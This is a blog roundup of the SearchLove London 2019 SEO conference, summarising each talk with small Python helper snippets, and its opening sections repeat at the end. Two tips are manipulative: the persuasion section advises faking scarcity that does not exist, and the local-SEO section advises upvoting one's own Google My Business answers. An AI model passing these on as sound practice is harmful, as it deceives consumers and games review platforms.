On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn't contradict any known facts or the scientific consensus. Cite all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
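To illustrate the UTM fix for Google My Business attribution: appending tracking parameters to the website URL you list in GMB lets analytics credit those clicks to organic rather than direct. A minimal sketch (the parameter values here are illustrative, not an official recommendation):

```python
from urllib.parse import urlencode, urlsplit, urlunsplit, parse_qsl

def add_utm(url, source="google", medium="organic", campaign="gmb"):
    """Append UTM parameters so Google My Business clicks are
    attributed to organic search instead of direct traffic."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query))  # preserve existing params
    query.update({"utm_source": source, "utm_medium": medium,
                  "utm_campaign": campaign})
    return urlunsplit(parts._replace(query=urlencode(query)))

print(add_utm("https://example.com/"))
# https://example.com/?utm_source=google&utm_medium=organic&utm_campaign=gmb
```

Paste the tagged URL into your GMB listing's website field, and the clicks will show up under the campaign you chose.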
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, reviews and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
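As a sketch of the custom-extraction idea (crawlers like Screaming Frog do this with CSS selectors or XPath at scale), here is the same pattern in plain Python against a made-up competitor snippet - the markup, SKUs and prices are all hypothetical:

```python
import re

# Made-up competitor product markup; a real crawl would fetch
# thousands of pages and apply the same extraction rule to each.
html = """
<div class="product" data-sku="A1"><span class="price">£19.99</span></div>
<div class="product" data-sku="B2"><span class="price">£24.50</span></div>
"""

def extract_prices(page):
    """Pull SKU/price pairs out of the page markup."""
    pattern = re.compile(
        r'data-sku="([^"]+)".*?class="price">£([\d.]+)', re.S)
    return {sku: float(price) for sku, price in pattern.findall(page)}

competitor = extract_prices(html)
our_prices = {"A1": 21.99, "B2": 23.00}  # hypothetical figures
# SKUs where the competitor undercuts us:
cheaper = {sku for sku, p in our_prices.items()
           if p > competitor.get(sku, float("inf"))}
print(cheaper)  # → {'A1'}
```

The output immediately flags the products where you are being undercut - exactly the kind of insight Luke suggests sharing with the wider team.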
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
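To make the regex point concrete, here is a toy sketch of catching branded query permutations despite misspellings - the pattern and queries are invented for illustration, and a real pattern would be tuned against your own query data:

```python
import re

# A hypothetical brand pattern tolerant of common misspellings of
# "distilled" - doubled/dropped letters and i/y swaps:
BRAND = re.compile(r"\bd+[iy]st+[iy]l+e?d\b", re.I)

queries = [
    "distilled seo agency",
    "DISTILLED searchlove",
    "distiled conference",
    "dystilled london",
    "digital marketing tips",
]
branded = [q for q in queries if BRAND.search(q)]
print(branded)  # all but the last, non-branded query
```

A VLOOKUP or exact-match filter in Excel would have missed "distiled" and "dystilled" entirely, which is exactly the advantage Robin describes.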
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don't rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it's more patient than Googlebot when it comes to rendering JavaScript, so isn't 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because they all impact each other, which makes the data noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
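As a toy sketch of the measurement idea - real split-testing platforms forecast a counterfactual for the variant group rather than comparing raw means, but the principle of judging a change by organic sessions looks like this (all numbers invented):

```python
from statistics import mean

# Invented daily organic sessions for a matched control group of pages
# and for the variant group of pages that received the change.
control = [1040, 980, 1010, 995, 1025, 1000, 990]
variant = [1130, 1095, 1150, 1110, 1140, 1120, 1105]

# Relative difference in average organic sessions between the groups
uplift = mean(variant) / mean(control) - 1
print(f"Estimated uplift in organic sessions: {uplift:+.1%}")  # +11.5%
```

In practice you would also want a significance check before calling the test a win or a loss.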
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession. You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in Screaming Frog, the scraper API or Chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
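As a minimal sketch of the kind of analysis this enables - assuming you have already scraped pairs of (page meta description, snippet displayed in the SERP) with one of the tools above - you could measure how often Google rewrites you:

```python
def rewrite_rate(pairs):
    """Share of results where the displayed snippet differs from the
    page's own meta description (normalised for whitespace and case)."""
    def norm(s):
        return " ".join(s.lower().split())
    rewritten = sum(1 for meta, snippet in pairs if norm(meta) != norm(snippet))
    return rewritten / len(pairs)

# Hypothetical crawl output: (meta description, snippet shown in the SERP)
sample = [
    ("Buy ballet shoes online.", "Buy ballet shoes online."),
    ("Buy ballet shoes online.", "Shop our range of ballet shoes for beginners."),
    ("Free UK delivery on all orders.", "Free UK delivery - order today."),
]
print(f"{rewrite_rate(sample):.0%} of snippets rewritten")  # 67% of snippets rewritten
```

The rewritten snippets themselves are then a ready-made corpus of the language Google thinks matches the query.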
Check out Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Faisal uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low-value URLs (faceted nav, query params, etc.); there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
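A minimal sketch of the first step - filtering Googlebot requests out of a combined-format access log and counting hits per URL (the log lines here are invented):

```python
import re
from collections import Counter

# Combined log format:
# IP - - [date] "METHOD /path HTTP/1.1" status size "referer" "user-agent"
LINE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) .*"(?P<ua>[^"]*)"$')

def googlebot_hits(log_lines):
    """Count Googlebot requests per URL path."""
    hits = Counter()
    for line in log_lines:
        m = LINE.search(line)
        if m and "Googlebot" in m.group("ua"):
            hits[m.group("path")] += 1
    return hits

sample = [
    '66.249.66.1 - - [14/Oct/2019:10:00:00 +0000] "GET /products HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '66.249.66.1 - - [14/Oct/2019:10:00:02 +0000] "GET /products?sort=price HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.9 - - [14/Oct/2019:10:00:05 +0000] "GET /products HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
# Only the two Googlebot lines are counted; the human visit is ignored.
print(googlebot_hits(sample))
```

Note that in production you should verify Googlebot by reverse DNS, since the user-agent string is trivially spoofed.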
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
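The formula translates directly into code - for instance (a sketch, not Dr Pete’s own implementation):

```python
import math

def rank_vol(rank: int, volume: int) -> float:
    """RankVol = 1 / (rank * sqrt(volume)).

    Higher values flag keywords where you rank well relative to their
    search volume; sorting by raw volume would overweight irrelevant terms.
    """
    return 1 / (rank * math.sqrt(volume))

# A position-3 ranking on a volume-100 keyword outscores a position-50
# ranking on a volume-10,000 keyword.
niche = rank_vol(rank=3, volume=100)     # 1 / (3 * 10)
head = rank_vol(rank=50, volume=10_000)  # 1 / (50 * 100)
assert niche > head
```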
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
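A sketch of what such a generator might look like, using only the standard library (the URLs and language pairs are hypothetical):

```python
from xml.etree import ElementTree as ET

SM = "http://www.sitemaps.org/schemas/sitemap/0.9"
XHTML = "http://www.w3.org/1999/xhtml"

def hreflang_sitemap(groups):
    """Serialise an XML sitemap in which every URL in a group lists all
    of its language alternates, itself included - hreflang annotations
    must be reciprocal or Google ignores them."""
    ET.register_namespace("", SM)
    ET.register_namespace("xhtml", XHTML)
    urlset = ET.Element(f"{{{SM}}}urlset")
    for group in groups:
        for _, loc in group:
            url = ET.SubElement(urlset, f"{{{SM}}}url")
            ET.SubElement(url, f"{{{SM}}}loc").text = loc
            for lang, href in group:
                ET.SubElement(url, f"{{{XHTML}}}link",
                              rel="alternate", hreflang=lang, href=href)
    return ET.tostring(urlset, encoding="unicode")

# Hypothetical en/de pair, e.g. exported from the Google Sheet mapping
sitemap = hreflang_sitemap([[("en", "https://example.com/en/"),
                             ("de", "https://example.com/de/")]])
print(sitemap)
```

In a real setup the `groups` structure would be read straight from the managed spreadsheet.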
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
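A first pass at bucketing queries can be as simple as a rule list - the trigger words below are illustrative only, and any mapping should be sanity-checked against what actually ranks for each query:

```python
import re

# Illustrative trigger patterns only - validate against the live SERP.
INTENT_RULES = [
    ("transactional", re.compile(r"\b(buy|price|cheap|deal|discount)\b")),
    ("informational", re.compile(r"\b(how|what|why|best|guide|vs)\b")),
    ("navigational", re.compile(r"\b(login|website|near me)\b")),
]

def classify(query: str) -> str:
    """Return the first matching intent bucket, else 'ambiguous'."""
    q = query.lower()
    for intent, pattern in INTENT_RULES:
        if pattern.search(q):
            return intent
    return "ambiguous"

assert classify("buy ballet shoes") == "transactional"
assert classify("best ballet shoes") == "informational"
assert classify("ballet shoes") == "ambiguous"
```

The "ambiguous" bucket is the interesting one - those are the queries where only the SERP itself can tell you the intent.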
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue is unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by 34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow its own directive not to crawl /example and will still be able to crawl /dont-crawl.
The Google documentation, the robots.txt checker in GSC, and the open source parser tend to disagree on what is allowed and disallowed, so you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
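One way to sanity-check a robots.txt before shipping it is Python’s standard-library parser, which models this group-selection behaviour:

```python
from urllib.robotparser import RobotFileParser

robots_txt = """\
User-agent: Googlebot
Disallow: /example

User-agent: *
Disallow: /dont-crawl
"""

rp = RobotFileParser()
rp.parse(robots_txt.splitlines())

# Googlebot matches its own group, so only that group applies -
# the * rules are not added on top of it.
assert not rp.can_fetch("Googlebot", "/example")    # blocked by its group
assert rp.can_fetch("Googlebot", "/dont-crawl")     # * rule does not cascade
assert not rp.can_fetch("OtherBot", "/dont-crawl")  # * group applies here
```

Since parsers disagree at the edges, treat this as one data point and test the same file in GSC as well.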
We often have a lot of intuition about how things like PageRank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year, make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts - something called scientific consensus. Cite all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
